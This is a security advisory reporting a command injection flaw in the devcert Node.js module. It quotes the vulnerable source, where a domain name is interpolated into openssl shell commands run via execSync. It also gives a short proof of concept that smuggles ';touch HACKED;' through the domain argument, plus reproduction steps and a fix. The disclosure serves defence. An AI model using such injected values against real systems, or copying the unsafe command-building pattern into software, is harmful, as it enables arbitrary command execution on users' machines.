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HistoryApr 30, 2020 - 9:41 p.m.

Node.js third-party modules: [devcert] Command Injection via insecure command formatting


0.003 Low




I would like to report a Command Injection issue in the devcert module.
It allows to execute arbitrary commands on the victim’s PC.


module name: devcertversion:1.1.0npm page:

Module Description

devcert - Development SSL made easy

Module Stats

[276,467] weekly downloads


Vulnerability Description

The issue occurs because a user input parameter is used inside a command that is executed without any check.

I tested the certificateFor function.

Here’s the code which causes the issue:


export async function certificateFor<O extends Options>(domain: string, options: O = {} as O): Promise<IReturnData<O>> { // <-- starting point
  debug(`Certificate requested for ${ domain }. Skipping certutil install: ${ Boolean(options.skipCertutilInstall) }. Skipping hosts file: ${ Boolean(options.skipHostsFile) }`);

  if (options.ui) {
    Object.assign(UI, options.ui);

  if (!isMac && !isLinux && !isWindows) {
    throw new Error(`Platform not supported: "${ process.platform }"`);

  if (!commandExists('openssl')) {
    throw new Error('OpenSSL not found: OpenSSL is required to generate SSL certificates - make sure it is installed and available in your PATH');

  let domainKeyPath = pathForDomain(domain, `private-key.key`);
  let domainCertPath = pathForDomain(domain, `certificate.crt`);

  if (!exists(rootCAKeyPath)) {
    debug('Root CA is not installed yet, so it must be our first run. Installing root CA ...');
    await installCertificateAuthority(options);
  } else if (options.getCaBuffer || options.getCaPath) {
    debug('Root CA is not readable, but it probably is because an earlier version of devcert locked it. Trying to fix...');
    await ensureCACertReadable(options);

  if (!exists(pathForDomain(domain, `certificate.crt`))) { 
    debug(`Can't find certificate file for ${ domain }, so it must be the first request for ${ domain }. Generating and caching ...`);
    await generateDomainCertificate(domain); // <-- domain is our payload

export const pathForDomain: (domain: string, ...pathSegments: string[]) => string = path.join.bind(path, domainsDir)

export default async function generateDomainCertificate(domain: string): Promise<void> {

  debug(`Generating private key for ${ domain }`);
  let domainKeyPath = pathForDomain(domain, 'private-key.key');  // <-- the variable is in the form 

  debug(`Generating certificate signing request for ${ domain }`);
  let csrFile = pathForDomain(domain, `certificate-signing-request.csr`);
  withDomainSigningRequestConfig(domain, (configpath) => {
    openssl(`req -new -config "${ configpath }" -key "${ domainKeyPath }" -out "${ csrFile }"`);

  debug(`Generating certificate for ${ domain } from signing request and signing with root CA`);
  let domainCertPath = pathForDomain(domain, `certificate.crt`);

  await withCertificateAuthorityCredentials(({ caKeyPath, caCertPath }) => {
    withDomainCertificateConfig(domain, (domainCertConfigPath) => {
      openssl(`ca -config "${ domainCertConfigPath }" -in "${ csrFile }" -out "${ domainCertPath }" -keyfile "${ caKeyPath }" -cert "${ caCertPath }" -days 825 -batch`)

// Generate a cryptographic key, used to sign certificates or certificate signing requests.
export function generateKey(filename: string): void {
  debug(`generateKey: ${ filename }`);  // <-- injection
  openssl(`genrsa -out "${ filename }" 2048`);
  chmod(filename, 400);

The input parameter domain is used to build the domainKeyPath variable.
If we pass \";touch HACKED;\" as input, the variable domainKeyPath will be something like this: /home/ubuntu/.config/devcert/domains/";touch HACKED;"/private-key.key (the first part depends on your OS).
As we can see the variable contains a valid shell command. Then, this variable is passed to the function generateKey, that finally calls openssl function:

import { execSync, ExecSyncOptions } from 'child_process';
import tmp from 'tmp';
import createDebug from 'debug';
import path from 'path';
import sudoPrompt from 'sudo-prompt';

import { configPath } from './constants';

const debug = createDebug('devcert:util');

export function openssl(cmd: string) {
  return run(`openssl ${ cmd }`, {  // <-- the command executed is: openssl genrsa -out "/home/ubuntu/.config/devcert/domains/";touch HACKED;"/private-key.key" 2048
    stdio: 'pipe',
    env: Object.assign({
      RANDFILE: path.join(configPath('.rnd'))
    }, process.env)

export function run(cmd: string, options: ExecSyncOptions = {}) {
  debug(`exec: \`${ cmd }\``);
  return execSync(cmd, options);  // <-- call child_process.execSync 

Steps To Reproduce:

  • create a directory for testing

    • mkdir poc
    • cd poc/
  • install devcert module:

    • npm i devcert
  • create the following PoC JavaScript file (poc.js):

const devcert = require('devcert');

async function poc() {
    let ssl = await devcert.certificateFor('\";touch HACKED;\"');
  • make sure that the HACKED file does not exist:
    • ls
  • execute the poc.js file:
    • node poc.js
  • the HACKED file is created:
    • ls



Do not concatenate/format commands using insecure user’s input. Always check and sanitize it.
In my opinion, it’s better to use child_process.execFile or child_process.spawn functions instead of child_process.execSync.

Supporting Material/References:

  • NODEJS VERSION: v13.13.0
  • NPM VERSION: 6.14.4

Wrap up

  • I contacted the maintainer to let them know: [N]
  • I opened an issue in the related repository: [N]

Thank you for your time.

best regards,



Command Injection on devcert module via insecure command formatting.